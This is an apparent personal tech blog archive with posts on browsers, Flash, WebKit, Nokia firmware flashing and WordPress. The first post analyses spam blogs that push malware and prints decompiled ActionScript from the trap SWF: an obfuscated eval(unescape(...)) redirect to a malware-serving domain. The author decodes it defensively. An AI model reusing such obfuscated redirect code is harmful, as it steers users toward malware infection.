Nasty blog, scary flash, why are you attacking me?

Yesterday I noticed that all of a sudden no less then 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on google’s blogger-platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their windows PC’s.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users;

  1. the blogpost contains what seems to be a youtube movie, but which actually is just a animated gif with a link behind it
  2. when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
  3. that blog.swf (which i downloaded on my linux-box and decompiled on the commandline using flare) contains this simple code:
    • this.getURL(‘javascript:eval(unescape(‘%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B’))’);
    • which translates roughtly into go to http://m08b.com/in.cgi?default
  4. and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.

Some lessons learned;

  • Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
  • Don’t trust the incoming links functionality google’s blogsearch provides (i switched back to technorati for the ‘binnenkomers’-widget on my blog)
  • The ‘report web forgery‘ function in Firefox (under ‘help’) works great. Use it!

Hey Adobe; get your Flash together

Flash sucks! Really! It crashes my Firefox all too often (every few days, especially when behind our company proxy) and playing Flash movies consumes way too much CPU-power for my liking. Apparently Mozilla and Adobe are blaming each other with regard to some of these problems, but this really seems to be a Flash-issue;

Moreover, I found a great howto on “Bort’s w3bl0g” about how to wrap Flash inside NSPluginWrapper in (Ubuntu) Linux, isolating Firefox from Flash-crashes. I’ll try that over the weekend, but it sure looks great!
But anyway; Adobe, get your shit together!

Google to launch Chrome, a Webkit-based browser

Yesterday Google confirmed that it would be releasing a new browser in beta today, named Chrome. Everything there is to know about this new open source browser for now, can be found in an online comic.
Based on that publication, the most important features seem to be;

  • each tab runs its own sandboxed process (limiting the damage one tab or plugin within a tab) can do (as is also the case in MSIE 8 beta with what they call “Loosely coupled IE”)
  • it is based on webkit (remember khtml and Apple’s Safari and all those mobile browsers)
  • it features a new javascript virtual machine, build by v8, a Danish company
  • the ‘omnibox’ (cfr. the ‘awesomebar‘ in Firefox) is located on the tab-level instead of the window and is thightly integrated with (you guessed it) google
  • a new tab shows you your 9 most visited sites and your 3 most uses search-engines (a bit like Opera Speeddial)
  • it features a ‘icognito’ mode in which nothing is logged (cfr. InPrivate browsing in IE 8 beta 2)
  • google gears comes prebaked
  • it is not clear if Google used Mozilla’s XUL/chrome to build the UI elements, but the name might be an indication that they did and the comic does state that Google “owes a great debt to other open source browser projects, especially Mozilla and Webkit”, so …

Looks very interesting, i’ll download is as soon as it’s available later today. But I’m curious what the Mozilla-guys think of what must be a double dent in their ego with a friend gone foo (well, to a certain extent) and with Google not using Mozilla’s Gecko as html-rendering engine.
Update; a screenshot of the new browser:

I’ve seen the browser-future, and it works!

Although browsers clearly have become better, faster and stronger (I doubt they’ve become “harder” as well), it sometimes seems as if no revolutions have taken place apart from the introduction of XMLHttpRequest by Microsoft back in 2000. But this morning I saw something that really blew my mind and the live mashup of that great Daft Punk song perfectly describes the mood I’m in since.
The reason for all this excitement is a prototype of new functionality in Firefox that redefines how you can interact with websites and -applications, allowing you to use the web more efficiently. Just watch this video to see what I’m raving about (skip the first 50 seconds to see the actual goods);

Ubiquity, as the 0.1 Firefox add-on is called, is the work of a group of smart people at Mozilla Labs, headed by Aza Raskin. Aza is the guy behind Humanized, the company that developed Enso, a merger of a GUI and a CLI leveraging the power of language in a graphical user interface. Aza and a number of his co-workers joined Mozilla at the beginning of 2008 and they’ve already produced some innovative ideas over the last few months.
Ubiquity is past that initial idea-stage, with a prototype that really builds on the great idea’s Aza and his Humanized co-workers had with regards to the power of language in a UI. I’ll bet you this will be the way to disclose and use microformats in Firefox as well (breaking the deadlock the microformat-guys were in). Even though it’s still in alpha/ prototype phase, this is the Future guys and it works! Now try it out, will ya!!

Webkit Konquering the mobile world

With the nineties browser wars and the quasi MSIE monopoly that followed after the Netscape debacle behind us, the desktop browser scene can be considered a mature market, with some very good products vying for our approval. Time to shift our attention to the next battleground; mobile browsers. Netfront and Pocket Internet Explorer dominated this emerging market for quite some time, but as of late some newcomers are making great advances in this area. And apart from Opera Mobile and Mini (the Mozilla-guys are really ages behind here), these all share the same open source core; WebKit.
The history of WebKit in 10 1/2 sentences
WebKit is a fork of KHTML, the html rendering-engine that was developed by the KDE-community for its Konquerer-browser. In 2002 Apple decided to build it’s own browser based on KHTML and thus WebKit was born as the core-component of what would become Safari. Since it’s inception, WebKit has gained enourmous momentum; Safari now has a market share of approx 6% on the desktop, but smaller projects such as iCab and Epiphany (the Gnome browser!) picked up WebKit as well. But there’s more; Adobe decided to incorporate it in Air (the Flex-like platform for building desktop-software). And Trolltech, the company behind the Qt GUI-toolkit and one of the primary backers of KDE, announced they would include Webkit in Qt 4.4 as well.

WebKit 0wnz Mobile
But the mobile area is where WebKit is really taking the world by storm; it not only powers the mobile version of Safari on the iPhone and the iPod Touch, but WebKit (in its S60webkit form) it’s also the basis of Symbian’s S60-browser. Nokia ‘s Mini Map Browser, as it’s officially named, was first released in november 2005 and thanks to the succces of Symbian it’s probably the most widespread mobile browser by far. Being a proud Nokia e61i-owner myself, I can testify that it is a great browser indeed; I didn’t even bother with installing Opera Mini (which I used instead of Netfront on my Sony-Ericsson w810).
Next to these two well-established WebKit-derivatives, the lesser known Iris (for Windows Mobile), newcomer Digia (for Symbian UIQ-devices) and last but not least the browser of Google’s highly anticipated mobile Android OS are also part of the family.
Mobile Web, but there’s more then One
So thanks to KDE’s great job on KHTML and Apple’s (and Nokia’s) subsequent work, we are at a point where users of ‘smartphones’ and similar devices can access the internet almost as if they were using a desktop-browser. But screen-size, text-input, data transfer (bandwidth and price) and context remain very different from normal browsing, so don’t believe the “one web”-hype just yet. But still; these sure are great web times for building mobile(-ready) websites and -applications!

Spammers grabbing headlines

Spam headlines sure make for an interesting read nowadays;

For a split second they succeeded in getting my attention and I almost opened some of these mails on mere impuls. A good thing they were already classified as spam.

Whack your Flash-crazy boss on the head with his iPhone3G!

Whatever you may think about the iPhone-hype, you’ll have to admit that the fact that it doesn’t do Flash makes for great ammunition in the discussion against developing your site’s core functionality in Flash.
Next time your CEO or marketing manager wants a Flex-only website, you won’t have to talk about some obscure geek who doesn’t want to install the Flash plugin, about that poor blind woman who is not able to “read” those Flash animations or about how Google indexing SWF-files might be more of a problem then a solution. No, instead, you’ll only have to point out it won’t work on his iPhone (*). Period.

(*) It won’t work on other mobile devices either; Flash Lite, which ships on e.g. Symbian and Windows Mobile powered devices, is not able to display those millions of fancy animations out there on the WWW either.

.

Flashing my Nokia keyboard into shape

So I bought a 2nd hand Nokia e61i which had a messed up keyboard configuration. Symbian OS does not allow you to change your keyboard settings as I had hoped for somewhat naively. The configuration is ‘hardcoded’ in the firmware and cannot be changed officially except by Nokia Service personnel. A good thing there’s Google, a nice little hacker tool and the Nokia Software Update utility.
These are the steps I followed to flash my Nokia with the correct firmware (only possible under MS Windows XP or Vista afaik);

  1. Backup your phone‘s data using e.g. the Nokia PC suite (this will not back the old firmware, only your data)
  2. Press *#0000# on your phone and write down the firmware info you see, in my case this was:
    • 2.0633.65.01
    • 02-10-07
    • RM-227
    • nokia e61i-1
  3. Check the product code of your phone (underneath the battery) and write that down. In my case this was “0542890”
  4. Go to this page to find alternative product codes for your phone, crosschecking with the info from (2) and (3). I decided I needed “0538563 EURO A Mocha/Silver” (which has QWERTY) instead of the current “0542890 EURO D French Mocha/Silver” (which has AZERTY)
  5. Download and installNokia Software Updater” and “Nemesis Service Suite
  6. Think twice before proceeding, the steps below may cause permanent damage to your phone and may void your warranty! You have been warned!
  7. So you’re sure you want to proceed? OK;
  8. Make sure the USB connection between your PC and phone can remain in place for the next 30 minutes or so (no cats or children that might want to play with that USB-cable). The USB-connection is your phone’s lifeline, if it gets cut during the upgrade, your phone dies (well, kinda).
  9. nemesis screenshot
  10. Fire up Nemesis:
    1. click on the right top button (with the magnifying glass) to scan for a new device
    2. click on the 2nd icon labeled “Phone Info
    3. in the “Production data edit” pane check the box next to “product code” and press “read“. The value there should match the product code you wrote down earlier
    4. replace the product code with the one you think you need (cfr. step 4) and press “write” (and do a “read” again to make sure the value is correct).
    5. close Nemesis
  11. nokia software updater: new firmware for my e61i
  12. Start Nokia Software Updater (can be done from within the PC Suite).
    1. NSU actually is a pretty straightforward wizard that will guide you through the upgrade process. You will be warned several times about the dangers of flashing your phone, but by this step you should know what you are doing, no?
    2. During the upgrade, your phone will restart several times, you’ll hear Windows play the sound to indicate USB-devices are plugged out/in. Don’t worry, this is normal.
    3. Close NSU when it says it’s ready
  13. Disconnect the USB-cable
  14. Check your phone’s firmware information by pressing *#0000# again. In my case this was
    • 3.0633.69.00
    • 06-02-08
    • RM-227
    • nokia e61i-1

So there you have it, not only was my keyboard mapping problem solved, I also got a free upgrade to the latest Nokia firmware. Qnd there zqs much rejoicing! đŸ˜‰

WordPress 2.6 svn-upgrade; ouch!

WordPress 2.6 has been pushed out the door at Automattic and it contains some exiting new goodies as usual. So I fired up my trusty upgrade script, but got an ugly php-error when accessing the database update-pages:

Parse error: syntax error, unexpected T_SL in wp-includes/widgets.php on line 464

Turns out that the wp_widget_search-function in wp-includes/widgets.php included some remnants of an SVN-merge. Don’t know if it was a sync problem at my side or if the faulty code was on the SVN-server (it isn’t now), but I ended up copy/pasting the correct function from a fresh tar-ball I downloaded.

New: cross-document messaging

With new versions of our trusted browsers coming out, web developers who like living on the edge can start  using some of the new features that are becoming available. One such goody is cross-document messaging, which is part of the HTML5 draft spec.
Cross-document messaging allows children of a window (think iframes, popups, …) to communicate using JavaScript, even if they originate from a different domain. This means that Instead of just iframing an external application, without being able to integrate further, your page can send and receive messages to/ from it. PostMessage could even be used to do cross-domain XHR (a hidden iframe on the same domain as a a remote datasource can be used as a proxy to perform XmlHttpRequests on that remote domain) untill the real thing hits the streets as well.
The two additions that allow you to perform such messaging, are window.postMessage and an eventlistener for events of the “message” type to handle the message. A pretty straightforward example of this can be found on JQuery’s John Resig’s site (see also his lastest blog entry about postMessage). As cross-domain javascript can be a potential big security risk, taking into account some precautions is really really really really really necessary. Really!
On the downside (as if security is not a problem); this brand new feature is only available in Firefox 3 for now. My own little test (a copy of John Resig’s example with some minor tweaks) worked in Opera 9.2x (and 9.5b) as well, but postMessage seems to have been dropped from the final Opera 9.5, as the tests on Opera Labs don’t seem to work any more either. Support for postMessage is also available in Webkit (Safari‘s backbone) nightly builds and in Microsoft’s IE 8 BETA (with the event being ‘onmessage’ instead of ‘message’ and some other quirks but hey, this is beta, no?).
So expect postMessage to be available in all major browsers by the end of the year. But why wait if you know that Facebook is already using postMessage in their chat application. I wonder what they fall back to if it is not available though …